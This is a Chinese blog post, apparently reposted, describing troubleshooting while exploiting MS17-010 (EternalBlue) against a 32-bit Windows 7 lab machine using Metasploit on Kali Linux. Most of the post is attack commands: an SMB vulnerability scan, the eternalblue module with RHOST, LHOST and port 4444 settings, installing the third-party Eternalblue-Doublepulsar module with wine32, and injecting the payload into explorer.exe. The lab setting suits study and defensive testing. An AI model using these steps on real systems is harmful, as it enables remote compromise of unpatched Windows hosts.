失眠网,内容丰富有趣,生活中的好帮手!
失眠网 > 关于利用kali linux.2中MSFCONSOLE 利用MS17-010漏洞发起攻击的坑

关于利用kali linux.2中MSFCONSOLE 利用MS17-010漏洞发起攻击的坑

时间:2021-10-27 03:30:06

相关推荐

关于利用kali linux.2中MSFCONSOLE 利用MS17-010漏洞发起攻击的坑

1、直接使用msfconsole中自带的 “ms17_010_eternalblue”模块

攻击机:192.168.148.134 kali linux.2 x64

靶机:192.168.148.137 win7 x32

1.1先用msfconsole的smb模块扫描,看看是否有漏洞

use auxiliary/scanner/smb/smb_ms17_010

auxiliary(smb_ms17_010) > set RHOSTS 192.168.148.137 若要范围扫描,则将IP改为 192.168.148.*

存在漏洞!!

1.2使用模块

use exploit/windows/smb/ms17_010_eternalblue

show options

设置目标:

set rhost 192.168.148.137

设置payload等

set lhost 192.168.148.134

set lport 4444

run

结果:

这里提示我们 架构选择不对,我们再来看看target

这个x64括号是指什么?

不知道,难道是payload设置错了?

这里用了show payloads,发现 这里可选择的payload都是64位的,我们的目标机是32位的,所以提示我们架构不对。

这时候,这个msf自带的模块似乎不能用。

2、使用github上的模块

/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/

2.1复制到ROOT目录,解压

2.2 将Github下载来的eternalblue_doublepulsar.rb,拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb目录中。

2.3打开msf,

执行reload_all

2.4调用模块

use exploit/windows/smb/eternalblue_doublepulsar

2.5查看选项

2.6设置

由于目标是win7 32 位,所以target选8(默认),然后run

2.7run

当执行exploit出现问题该如何解决?

打开多架构支持/安装wine32。

wine -h

2.8再次run

又报错,这时候,我们修改注入进程

set processinject explorer.exe

run

注入成功

截屏

如果觉得《关于利用kali linux.2中MSFCONSOLE 利用MS17-010漏洞发起攻击的坑》对你有帮助,请点赞、收藏,并留下你的观点哦!

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。